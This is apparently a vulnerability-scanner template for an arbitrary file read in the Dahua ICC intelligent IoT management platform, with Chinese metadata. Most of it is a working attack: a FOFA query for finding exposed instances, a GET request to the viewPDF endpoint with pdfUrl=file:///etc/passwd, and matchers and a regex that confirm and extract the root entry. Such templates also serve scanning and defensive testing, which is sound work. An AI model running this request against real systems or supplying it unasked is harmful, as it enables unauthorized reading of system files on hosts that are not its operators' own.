## id: VEID-2025-1210
## name: 大华ICC智能物联综合管理平台viewPDF存在任意文件读取
## author: hack007x
## severity: high
## tags: veid,file,veid2025
## description: 该漏洞出现在viewPDF?filename=x.pdf&pdfUrl=file: 可任意文件按读取
## fofa-query: body="location.hash.indexOf('/authLogin')" 
## verification: true


GET /evo-apigw/evo-cirs/material/viewPDF?filename=x.pdf&pdfUrl=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: status_code == 200
#@ matcher: header["Content-Type"] contains "pdf"
#@ matcher: body matches /root:[^:]*:[0-9]+:[0-9]+:/
#> extract: name=etc_passwd, from=body, regex=/(root:[^:]*:[0-9]+:[0-9]+:[^:]*:[^:]*:\/[^\n]+)/, group=1





# @VEIL-STAMP: ab16719c72f4ad995f809d65a8073ca44fdd5c78edb44161edb130d3e1190b59
